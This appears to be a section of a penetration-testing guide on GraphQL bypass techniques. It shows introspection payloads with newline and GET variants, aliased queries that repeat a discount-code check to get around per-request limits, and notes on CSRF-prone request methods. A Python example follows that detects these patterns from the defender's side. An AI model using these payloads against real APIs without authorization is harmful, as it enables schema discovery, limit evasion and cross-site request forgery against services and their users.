4. Bypass

4.1 Bypassing GraphQL Introspection Defenses

If introspection queries are disabled for the API you're testing, try inserting a special character after the __schema keyword. Developers might use a regex to exclude __schema in queries, which can be bypassed using characters like spaces, new lines, or commas.

Example: Introspection query with a newline after __schema (the newline is written as \n inside the JSON string so the body stays valid JSON)

{
    "query": "query{__schema\n{queryType{name}}}"
}

4.2 Use Different Request Methods

The same query can be sent URL-encoded as a GET parameter; a GET handler may not be covered by the same filtering as the POST path (%0A is the encoded newline):

GET /graphql?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7D

4.3 Aliased Queries

Aliases let one request select the same field several times; each aliased selection is resolved as a separate call, so per-request limits may not count them individually.

query isValidDiscount($code: Int) {
    isValidDiscount(code:$code){
        valid
    }
    isValidDiscount2:isValidDiscount(code:$code){
        valid
    }
    isValidDiscount3:isValidDiscount(code:$code){
        valid
    }
}

4.4 CSRF

Secure POST Requests: POST requests with an application/json body are safe from CSRF only if the server validates the Content-Type header, since a cross-origin HTML form cannot send application/json without a CORS preflight.

Vulnerable Request Methods: GET requests, or POST requests with an application/x-www-form-urlencoded body, can be submitted cross-origin by a plain form and therefore leave users vulnerable to CSRF attacks.
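As an added defender-side example (not code from the original page), the Python below shows why the naive regex from 4.1 misses the newline and comma variants, normalises the query before checking for __schema/__type, classifies the GET and form-encoded request shapes from 4.2 and 4.4 as CSRF-prone, and counts the aliased re-invocations from 4.3. The naive regex, the sample requests and the alias heuristic are constructed for illustration and are not taken from any real implementation.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Naive filter as described in 4.1: a newline or comma after "__schema" slips past it.
NAIVE_INTROSPECTION_RE = re.compile(r"__schema ?\{")
# GraphQL ignores whitespace, newlines and commas between tokens; strip them first.
IGNORED_RE = re.compile(r"[\s,]+")
INTROSPECTION_FIELDS = ("__schema", "__type")
# Heuristic for 4.3: count "alias: field(" / "alias: field{" pairs per field name.
ALIAS_RE = re.compile(r"(\w+)\s*:\s*(\w+)\s*[({]")

# Constructed sample requests modelled on sections 4.1 to 4.3 (not captured traffic).
NEWLINE_BODY = json.dumps({"query": "query{__schema\n    {queryType{name}}}"})
GET_TARGET = "/graphql?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7D"
ALIASED_BODY = json.dumps({"query": (
    "query isValidDiscount($code: Int) { isValidDiscount(code:$code){ valid }"
    " isValidDiscount2:isValidDiscount(code:$code){ valid }"
    " isValidDiscount3:isValidDiscount(code:$code){ valid } }")})

def naive_is_introspection(query: str) -> bool:
    return bool(NAIVE_INTROSPECTION_RE.search(query))

def is_introspection(query: str) -> bool:
    compact = IGNORED_RE.sub("", query)  # "__schema\n    {" becomes "__schema{"
    return any(f + c in compact for f in INTROSPECTION_FIELDS for c in "{(")

def aliased_field_counts(query: str) -> dict:
    counts: dict = {}
    for _alias, field in ALIAS_RE.findall(query):
        counts[field] = counts.get(field, 0) + 1
    return counts

def extract_query(method: str, content_type: str, target: str, body: str):
    """Return (query, csrf_prone): only a POST whose validated media type is
    application/json is treated as CSRF-safe; GET and form posts are flagged."""
    media_type = content_type.split(";")[0].strip().lower()
    if method.upper() == "GET":
        return parse_qs(urlsplit(target).query).get("query", [""])[0], True
    if media_type == "application/json":
        return json.loads(body or "{}").get("query", ""), False
    if media_type == "application/x-www-form-urlencoded":
        return parse_qs(body).get("query", [""])[0], True
    return "", True

def inspect_request(method: str, content_type: str, target: str, body: str) -> dict:
    query, csrf_prone = extract_query(method, content_type, target, body)
    return {"introspection": is_introspection(query), "csrf_prone": csrf_prone,
            "naive_filter_caught_it": naive_is_introspection(query),
            "aliased": aliased_field_counts(query)}
```

Running inspect_request over the three sample requests shows the newline and GET variants reaching the resolver as introspection while the naive regex reports nothing, and the aliased request resolving isValidDiscount twice more than its unaliased selection.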